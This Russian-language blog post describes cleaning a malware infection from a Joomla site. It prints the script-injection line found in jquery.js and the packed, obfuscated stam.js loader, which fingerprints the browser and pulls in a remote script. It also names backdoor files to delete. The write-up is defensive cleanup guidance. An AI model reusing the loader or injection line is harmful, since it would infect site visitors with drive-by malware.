Лечим вирус на сайте
Первоначальный осмотр сайта обнаружил, что у клиента закрыт доступ по фтп, что сузило круг подозреваемых уязвимостей, стало быть отверстие в какомто скрипте движка joomla. Касперский яростно ругался на подключение images/stam.js туда мы и заглянули.
Начинаем просматривать свои файлы .js, вредный код был обнаружен в файле jquery.js. Так как файл это был ужат мы сразу видим новою строку в нём:
document.write("<scr"+"ipt src='/administrator/images/stam.js'><"+"/script>");
Где идет иммитация вывода на страницу изображения, но вместо этого запускается вредоносный js скрипт. Проходим по пути чтобы осмотреть запускаемый скрипт. Открыв stam.js мы видем подобный этому код:
еtvаl(funсtion(p,а,с,k,e,d){e=funсtion(c){return(c<a?'':e(pаrseInt(с/а)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4 l(b){r(5.j&&5.v){2 k=5.v(\'P\')[0];2 6=5.j(\'O\');6.i(\'N\',\'L/M\');6.i(\'b\',b);k.R(6)}}4 m(3){a 3.e("Y")==-1}2 W="V&)/#.-#K,{[S=f";2 T="Z%[]t,C&F,";2 A="{c;d]z$y@x}#8";2 B="&D$&H-:G$I]}J";2 w="Q/7@1]15`##n=";4 s(3){a 3.e(9)!=-1}2 10="@7;1d><$p=";2 1j="E!]U]1m`1k>.1c+";2 13="12![h<<^^]!^^";2 16="1a`19`/18~(?E:{";2 17="14,`X$11^0-8";4 o(){a q.1b()}2 u="1i://1l.1e.3/1f";2 9="9";4 g(){2 3=q.1g.1h();r(m(3)&&s(3)&&o()){l(u)}}g();',62,85,'||var|ua|function|document|script_tag|||win|return|src||
|indexOf|
|includeCounter||setAttribute|createElement|head_tag|includeJavasc
ript|notChrome|
|cond3||navigator|if|isWin||url|getElementsByTagName|cTYsgONk4|k
J|IhJ|2f|cTYsgONk2|
cTYsgONk3||9WS5D||QPV8v|O6|4WO|PV|0jq|Vkc|text|javascript|t
pe|script|head|zY|
appendChild|uHq|cTYsgONk1||UIEO|cTYsgONk0||chrome|_Odq|aw
hCP0|fba|sDWvX|awhCP2|J6|
BME|awhCP3|awhCP4|lV|70X|62J|javaEnabled|9U7|O65|pp
|7f19e0d8bf0e763830067e494e53e9237f19e0d8bf0e763830067e494e5
3e92|userAgent|toLowerCase|http|awhCP1|J9FI|letyl|K87'.split('|')
,0,{})
Удаляем этот файл, проверяем права на запись в эту диреткориию, лечим или перезаливаем зараженный файл, устанавлвиаем необходимые права на файл и директорию с ним.
Идем дальше, заходим в диреторию includes хранящей файлы необходимый для работы вашей joomla. Удаляем файлы по следующим путям файлы, они содержат украденный у вас пароль от фтп и не только, открывают общий доступ к вашему сайту.
\includes\js\ThemeOffice\language.php
\includes/patTemplate/patTemplate\InputFilter.php
Важно помнить , что регулярно обновляйте свою систему, раставляйте правльно права на файлы, ограничивайте доступ менеджерам, установитена свой компьютер нормальный антивирус.
Лечим вирус на сайте - Генератор расширений Joomla и многое другое на нашем сайте посвященном работе расширений, компонентов, модулей, плагинов для линейки Joomla. Отправляйте ссылку на страницу своим друзьям и в социальные сети воспользовавшись графическими иконками выше.